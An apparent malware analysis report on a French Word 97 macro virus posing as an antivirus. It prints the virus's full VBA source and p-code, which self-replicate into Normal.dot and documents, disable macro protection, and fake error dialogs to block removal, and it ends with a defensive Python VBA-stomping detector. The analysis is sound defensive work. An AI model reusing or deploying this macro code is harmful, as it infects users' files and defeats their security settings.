Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b137d9838bba6c9f…

MALICIOUS

Office (OLE)

Size: 49.5 KB
Created: 1998-04-24 13:49:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 68bea7500c08c36762ced3f7e4e229e6
SHA-1: b253135019fe50778a79a70f1a2eb18006e6c477
SHA-256: b137d9838bba6c9f0850911161b044b87a184a9445da7482243ce234fafc6f28
Risk Score: 248

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a classic Word 97 macro virus. The VBA project carries a module named ZMK98FAV (the status-bar text expands this to "ZeMacroKiller98 Faux AntiVirus", i.e. a fake antivirus) and a UserForm named ZMK98BM, and it mixes WordBasic compatibility calls (WordBasic.DisableAutoMacros, WordBasic.CountMacros, WordBasic.[MacroName$]) with the VBA object model. Every routine opens by disabling the user's defences: Ctrl+Break is switched off (EnableCancelKey = wdCancelDisabled), auto-macros are kept enabled (DisableAutoMacros 0), the Word 97 macro warning is turned off (Options.VirusProtection = False) and the prompt to save changes to the Normal template is suppressed (Options.SaveNormalPrompt = False).

AutoOpen enumerates the macros in the Normal template and, if ZMK98FAV is not already there, announces itself ("I am a new AntiVirus for Word 97"), then uses Application.OrganizerCopy to install both project items from the active document into Normal.dot. It then busy-waits, searches the current directory tree for *.doc files and, for each hit, opens the file, copies both items into it from the Normal template, and saves it, finishing with a taunt that the analysed files "are infected by me" and a call to the macro FichierFermerTout (which appears to be the French-localized name of the FileCloseAll command). Note that .Execute() is invoked before FileName, LookIn and SearchSubFolders are set, so directory-wide spreading depends on whatever criteria the FileSearch object last held; because every routine runs under On Error GoTo, the first runtime error silently ends it. Infection of the global template does not depend on that bug, and the FileSaveAs hook provides a second vector: after showing the Save As dialog it silently re-saves documents in template format, copies both project items into them and displays "You'd better buy a REAL ANTIVIRUS...".

The remaining hooks are stealth: ToolsMacro shows the decoy ZMK98BM form instead of the macro dialog, and FileTemplates and ViewVBCode display fake Word error boxes ("Insufficient stack space." and "This program has performed an illegal operation and will be shut down.") so the user cannot inspect or remove the macros. There is no dropped binary or network activity; the impact is self-propagation through Normal.dot and every opened or saved document, tampering with macro security settings, and silent conversion of documents to templates. The heuristic firings below line up with this behaviour and the verdict is MALICIOUS.

Heuristics 5

  • ClamAV: Doc.Trojan.Zmk-3 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zmk-3
  • VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (critical) OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    Options.VirusProtection = False
  • AutoOpen macro (low) OLE_VBA_AUTOOPEN
    AutoOpen macro runs automatically when the document is opened
    Matched line in script:
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers (high) OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14176 bytes
SHA-256: 14b69d56fc5c1ec0710fcbdffb61b81d02223b12a4e3ae72f39ec2c17d422f27
Detection
ClamAV: Doc.Trojan.Zmk-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ZMK98FAV"
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAO
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0) = "ZMK98FAV" Then
        ZMK98FAVInstalled = -1
    End If
Next i
If Not ZMK98FAVInstalled Then
    MsgBox "Je suis un nouveau AntiVirus pour Word 97", vbInformation, "ZMK98FAV"
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="ZMK98FAV", Object:=wdOrganizerObjectProjectItems
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="ZMK98BM", Object:=wdOrganizerObjectProjectItems
    StatusBar = "Analyse du répertoire: " & CurDir & " pour trouver des fichier DOC..."
    For i = 1 To 500000
    Next i
    With Application.FileSearch
    If .Execute() > 0 Then
        .FileName = "*.doc"
        .LookIn = CurDir
        .SearchSubFolders = True
        For i = 1 To .FoundFiles.Count
            StatusBar = "Analyse de " & .FoundFiles(i) & " en cours..."
            Documents.Open FileName:=.FoundFiles(i)
            Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="ZMK98FAV", Object:=wdOrganizerObjectProjectItems
            Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="ZMK98BM", Object:=wdOrganizerObjectProjectItems
            ActiveDocument.Save
            StatusBar = "Analyse de " & .FoundFiles(i) & " terminé..."
        Next i
        MsgBox "Analyse du répertoire " & CurDir & " terminé!!!" & Chr$(13) & "Les " & .FoundFiles.Count & " fichiers analysés sont infectés par moi" & Chr$(13) & "HAHAHAHAHA!!!!", vbCritical, "ZMK98FAV"
        StatusBar = "[ZMK98FAV] ZeMacroKiller98 Faux AntiVirus, HAHAHAHAHA!!!!"
        Application.Run MacroName:="FichierFermerTout"
    Else
        MsgBox "Pas de fichier DOC trouvé dans " & CurDir, vbInformation, "ZMK98FAV"
        MsgBox "Mais moi, je vous ai infecté..." & Chr$(13) & "HAHAHAHAHA!!!!!", vbCritical, "ZMK98FAV"
    End If
    End With
End If
ErrorAO:
End Sub
Sub FileSaveAs()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFSA
    Dialogs(wdDialogFileSaveAs).Show
    If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
        ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
    End If
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="ZMK98FAV", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="ZMK98BM", Object:=wdOrganizerObjectProjectItems
MsgBox "Vous feriez mieux d'acheter un VRAI ANTIVIRUS..." & Chr$(13) & "HAHAHAHAHA!!!!!", vbCritical, "ZMK98FAV"
ActiveDocument.Save
ErrorFSA:
End Sub
Sub FileTemplates()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFT
    MsgBox "Espace Pile Insuffisant.", vbCritical, "Microsoft Word"
ErrorFT:
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorTM
    ZMK98BM.Show
ErrorTM:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
    MsgBox "Ce programme a réalisé une opération illégale et va être interrompu.", vbCritical, "Microsoft Word"
ErrorVVBC:
End Sub

Attribute VB_Name = "ZMK98BM"
Attribute VB_Base = "0{79B61193-DB8A-11D1-82B2-343705C10000}{79B61186-DB8A-11D1-82B2-343705C10000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub CommandButton1_Click()
Unload ZMK98BM
End Sub

Private Sub UserForm_Initialize()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End Sub

' Processing file: /tmp/qstore__cu9120l
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1125 bytes
' Macros/VBA/ZMK98FAV - 9664 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #2:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	OnError ErrorAO 
' Line #6:
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemLd CountMacros 0x0002 
' 	St iMacroCount 
' Line #7:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld iMacroCount 
' 	For 
' Line #8:
' 	Ld i 
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemLd [MacroName$] 0x0002 
' 	LitStr 0x0008 "ZMK98FAV"
' 	Eq 
' 	IfBlock 
' Line #9:
' 	LitDI2 0x0001 
' 	UMi 
' 	St ZMK98FAVInstalled 
' Line #10:
' 	EndIfBlock 
' Line #11:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #12:
' 	Ld ZMK98FAVInstalled 
' 	Not 
' 	IfBlock 
' Line #13:
' 	LitStr 0x0029 "Je suis un nouveau AntiVirus pour Word 97"
' 	Ld vbInformation 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ArgsCall MsgBox 0x0003 
' Line #14:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #15:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0007 "ZMK98BM"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #16:
' 	LitStr 0x0017 "Analyse du répertoire: "
' 	Ld CurDir 
' 	Concat 
' 	LitStr 0x0020 " pour trouver des fichier DOC..."
' 	Concat 
' 	St StatusBar 
' Line #17:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI4 0xA120 0x0007 
' 	For 
' Line #18:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #19:
' 	StartWithExpr 
' 	Ld Application 
' 	MemLd FileSearch 
' 	With 
' Line #20:
' 	ArgsMemLdWith Execute 0x0000 
' 	LitDI2 0x0000 
' 	Gt 
' 	IfBlock 
' Line #21:
' 	LitStr 0x0005 "*.doc"
' 	MemStWith FileName 
' Line #22:
' 	Ld CurDir 
' 	MemStWith LookIn 
' Line #23:
' 	LitVarSpecial (True)
' 	MemStWith SearchSubFolders 
' Line #24:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	MemLdWith FoundFiles 
' 	MemLd Count 
' 	For 
' Line #25:
' 	LitStr 0x000B "Analyse de "
' 	Ld i 
' 	ArgsMemLdWith FoundFiles 0x0001 
' 	Concat 
' 	LitStr 0x000C " en cours..."
' 	Concat 
' 	St StatusBar 
' Line #26:
' 	Ld i 
' 	ArgsMemLdWith FoundFiles 0x0001 
' 	ParamNamed FileName 
' 	Ld Documents 
' 	ArgsMemCall Option 0x0001 
' Line #27:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #28:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0007 "ZMK98BM"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #29:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #30:
' 	LitStr 0x000B "Analyse de "
' 	Ld i 
' 	ArgsMemLdWith FoundFiles 0x0001 
' 	Concat 
' 	LitStr 0x000B " terminé..."
' 	Concat 
' 	St StatusBar 
' Line #31:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #32:
' 	LitStr 0x0016 "Analyse du répertoire "
' 	Ld CurDir 
' 	Concat 
' 	LitStr 0x000B " terminé!!!"
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x0004 "Les "
' 	Concat 
' 	MemLdWith FoundFiles 
' 	MemLd Count 
' 	Concat 
' 	LitStr 0x0028 " fichiers analysés sont infectés par moi"
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x000E "HAHAHAHAHA!!!!"
' 	Concat 
' 	Ld vbCritical 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ArgsCall MsgBox 0x0003 
' Line #33:
' 	LitStr 0x0039 "[ZMK98FAV] ZeMacroKiller98 Faux AntiVirus, HAHAHAHAHA!!!!"
' 	St StatusBar 
' Line #34:
' 	LitStr 0x0011 "FichierFermerTout"
' 	ParamNamed MacroName 
' 	Ld Application 
' 	ArgsMemCall Run 0x0001 
' Line #35:
' 	ElseBlock 
' Line #36:
' 	LitStr 0x001F "Pas de fichier DOC trouvé dans "
' 	Ld CurDir 
' 	Concat 
' 	Ld vbInformation 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ArgsCall MsgBox 0x0003 
' Line #37:
' 	LitStr 0x001F "Mais moi, je vous ai infecté..."
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x000F "HAHAHAHAHA!!!!!"
' 	Concat 
' 	Ld vbCritical 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ArgsCall MsgBox 0x0003 
' Line #38:
' 	EndIfBlock 
' Line #39:
' 	EndWith 
' Line #40:
' 	EndIfBlock 
' Line #41:
' 	Label ErrorAO 
' Line #42:
' 	EndSub 
' Line #43:
' 	FuncDefn (Sub FileSaveAs())
' Line #44:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #45:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #46:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #47:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #48:
' 	OnError ErrorFSA 
' Line #49:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #50:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #51:
' 	Ld wdFormatTemplate 
' 	ParamNamed FileFormat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0001 
' Line #52:
' 	EndIfBlock 
' Line #53:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #54:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0007 "ZMK98BM"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #55:
' 	LitStr 0x0030 "Vous feriez mieux d'acheter un VRAI ANTIVIRUS..."
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x000F "HAHAHAHAHA!!!!!"
' 	Concat 
' 	Ld vbCritical 
' 	LitStr 0x0008 "ZMK98FAV"
' 	ArgsCall MsgBox 0x0003 
' Line #56:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #57:
' 	Label ErrorFSA 
' Line #58:
' 	EndSub 
' Line #59:
' 	FuncDefn (Sub FileTemplates())
' Line #60:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #61:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #62:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #63:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #64:
' 	OnError ErrorFT 
' Line #65:
' 	LitStr 0x0018 "Espace Pile Insuffisant."
' 	Ld vbCritical 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #66:
' 	Label ErrorFT 
' Line #67:
' 	EndSub 
' Line #68:
' 	FuncDefn (Sub ToolsMacro())
' Line #69:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #70:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #71:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #72:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #73:
' 	OnError ErrorTM 
' Line #74:
' 	Ld ZMK98BM 
' 	ArgsMemCall Show 0x0000 
' Line #75:
' 	Label ErrorTM 
' Line #76:
' 	EndSub 
' Line #77:
' 	FuncDefn (Sub ViewVBCode())
' Line #78:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #79:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #80:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #81:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #82:
' 	OnError ErrorVVBC 
' Line #83:
' 	LitStr 0x0044 "Ce programme a réalisé une opération illégale et va être interrompu."
' 	Ld vbCritical 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #84:
' 	Label ErrorVVBC 
' Line #85:
' 	EndSub 
' Macros/VBA/ZMK98BM - 2685 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub CommandButton1_Click())
' Line #2:
' 	Ld ZMK98BM 
' 	ArgsCall Unlock 0x0001 
' Line #3:
' 	EndSub 
' Line #4:
' Line #5:
' 	FuncDefn (Private Sub UserForm_Initialize())
' Line #6:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #7:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #8:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #9:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #10:
' 	EndSub
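The commented listing above is the disassembled p-code of each module stream, which is what Word actually executes; the decompiled source text is stored separately in the same stream and is what olevba shows. The two can be made to disagree (VBA stomping), so a source-only scan such as the heuristics in this report can be blinded. As an added example (not code from this report or from pcodedmp/oletools), the following Python parses a pcodedmp-style listing, collects procedure definitions and Receiver.Member references per module, and reports anything the source text does not also contain. The listing and both source variants are constructed and abridged from the ZMK98FAV AutoOpen routine above. One caveat visible in the report itself: pcodedmp renders a few identifiers differently from the source (ArgsMemCall Option where the source reads Documents.Open, Unlock for Unload, ParamNamed New/On for the Name:=/Object:= arguments), so a non-empty difference is a prompt to read both side by side, not proof of tampering.

```python
"""Cross-check a pcodedmp listing against the decompiled VBA source.

Added example, not part of this report or of pcodedmp/oletools. References
present in the compiled p-code but absent from the source text indicate the
source shown to analysts is not what Word would run (VBA stomping).
"""
from __future__ import annotations

import re

MODULE_RE = re.compile(r"^' (Macros/VBA/\S+) - \d+ bytes")
FUNC_RE = re.compile(r"FuncDefn \((?:Public |Private )?(?:Sub|Function) (\w+)")
LD_RE = re.compile(r"^'\s+Ld (\w+)")
RESET_RE = re.compile(r"^'\s+(?:ArgsLd|\w+With) ")   # receiver unknown after these
MEM_RE = re.compile(r"^'\s+(?:MemSt|MemLd|ArgsMemCall|ArgsMemLd) (\w+)")

SOURCE_PROC_RE = re.compile(r"^\s*(?:Public |Private )?(?:Sub|Function) (\w+)", re.M)
SOURCE_MEMBER_RE = re.compile(r"\b([A-Za-z_]\w*)\.([A-Za-z_]\w*)")


def refs_from_pcode(listing: str) -> dict[str, set[str]]:
    """Per module stream: procedure names plus 'Receiver.Member' references.

    The receiver is the most recent plain `Ld` within the same source line,
    which is exact for the one-level obj.member shapes this family uses.
    With-block opcodes and calls on indexed results (ArgsLd) reset the
    receiver instead of guessing it, so those members are skipped.
    """
    refs: dict[str, set[str]] = {}
    module: str | None = None
    last_ld: str | None = None
    for line in listing.splitlines():
        m = MODULE_RE.match(line)
        if m:
            module, last_ld = m.group(1), None
            refs[module] = set()
            continue
        if module is None:
            continue
        if line.startswith("' Line #") or RESET_RE.match(line):
            last_ld = None  # operand stack is empty at the start of a line
            continue
        m = FUNC_RE.search(line)
        if m:
            refs[module].add(m.group(1))
            continue
        m = LD_RE.match(line)
        if m:
            last_ld = m.group(1)
            continue
        m = MEM_RE.match(line)
        if m and last_ld:
            refs[module].add(f"{last_ld}.{m.group(1)}")
    return refs


def refs_from_source(source: str) -> set[str]:
    """Procedure names and 'Receiver.Member' pairs written in the source text."""
    refs = set(SOURCE_PROC_RE.findall(source))
    refs |= {f"{obj}.{mem}" for obj, mem in SOURCE_MEMBER_RE.findall(source)}
    return refs


def stomping_indicators(listing: str, source: str) -> set[str]:
    """References the p-code contains but the source does not (case-insensitive)."""
    in_source = {r.casefold() for r in refs_from_source(source)}
    pcode = set().union(*refs_from_pcode(listing).values())
    return {r for r in pcode if r.casefold() not in in_source}


# Constructed listing in pcodedmp's layout, abridged from the AutoOpen p-code above.
PCODE_LISTING = """\
' Module streams:
' Macros/VBA/ZMK98FAV - 9664 bytes
' Line #0:
' \tFuncDefn (Sub AutoOpen())
' Line #1:
' \tLd wdCancelDisabled 
' \tLd Application 
' \tMemSt EnableCancelKey 
' Line #2:
' \tLitDI2 0x0000 
' \tLd WordBasic 
' \tArgsMemCall DisableAutoMacros 0x0001 
' Line #3:
' \tLitVarSpecial (False)
' \tLd Options 
' \tMemSt VirusProtection 
' Line #4:
' \tLd ActiveDocument 
' \tMemLd FullName 
' \tParamNamed Source 
' \tLd NormalTemplate 
' \tMemLd FullName 
' \tParamNamed Destination 
' \tLitStr 0x0008 "ZMK98FAV"
' \tParamNamed New 
' \tLd wdOrganizerObjectProjectItems 
' \tParamNamed On 
' \tLd Application 
' \tArgsMemCall OrganizerCopy 0x0004 
' Line #5:
' \tEndSub 
"""

# Constructed source that genuinely matches the listing.
HONEST_SOURCE = """\
Sub AutoOpen()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="ZMK98FAV", Object:=wdOrganizerObjectProjectItems
End Sub
"""

# Constructed benign source as a stomper would leave it beside the same p-code.
STOMPED_SOURCE = """\
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
"""

if __name__ == "__main__":
    print("honest source:", sorted(stomping_indicators(PCODE_LISTING, HONEST_SOURCE)))
    print("stomped source:", sorted(stomping_indicators(PCODE_LISTING, STOMPED_SOURCE)))
```

With the honest source the difference is empty; with the stomped source the p-code-only set surfaces AutoOpen, Application.OrganizerCopy and Options.VirusProtection, the same indicators the heuristics above key on, even though the source text looks harmless. In practice the listing comes from running pcodedmp (or olevba with p-code output) on the carved document and the source from the VBA source view of the same stream.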